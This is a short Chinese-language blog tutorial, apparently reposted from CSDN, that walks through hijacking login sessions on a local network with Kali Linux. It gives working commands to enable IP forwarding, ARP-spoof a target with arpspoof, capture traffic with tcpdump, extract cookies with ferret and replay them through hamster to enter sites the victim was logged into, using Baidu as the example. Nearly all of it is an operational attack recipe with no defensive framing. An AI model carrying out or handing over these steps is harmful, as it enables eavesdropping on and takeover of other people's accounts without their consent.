kali局域网cookie会话劫持

kali局域网cookie会话劫持

再次声明
小白一枚
小白一枚
小白一枚

原理:
利用抓包实现,重现流量,登录别人登录过的网站。
话不多说,开始

用到的工具:VM,kali,arpspoof ,tcpdump,ferrrt,hamster

第一步打开虚拟机
第二步开启IP流量转发

echo 1 > /proc/sys/net/ipv4/ip_forward      修改
cat /proc/sys/net/ipv4/ip_forward           查看
1  										    1为开启,0为关闭

在这里插入图片描述

第三步开启arp欺骗
用法 : Arpspoof -i (自己网卡) -t 目标IP 网关
命令arpspoof -i eth0 -t 192.168.0.254 192.168.0.1

在这里插入图片描述

第四步使用tcpdump 对数据进行抓包,嗅探,我们这里用百度登录,个人中心之类的

tcpdump -i eth0 -w./cookie.pcap
用法-i自己的网卡,-w保存文件名字。pcap后缀名

在这里插入图片描述
在这里插入图片描述

第五步使用ferret工具,重新生成抓包后文件,生成了一个文件.txt
这个工具需要安装,自行百度安装

用法:ferret -r 文件名字.pcap
ferret -r cookie.pcap 

在这里插入图片描述
第六步
设置网页代理为IP为127.0.0.1 端口为1234

打开浏览器点右边点击 preferenges 进去最下面network proxy进去修改HTTP的代理

在这里插入图片描述
第七步使用hamster工具,打开浏览器输入127.0.0.1:1234

在这里插入图片描述
在这里插入图片描述

之后就可以登录已经登录过的网址了
在这里插入图片描述

结束

有错误还望大佬指点 小白一枚,有兴趣的可以互相学习

猜你喜欢

转载自blog.csdn.net/qq_44693903/article/details/90115202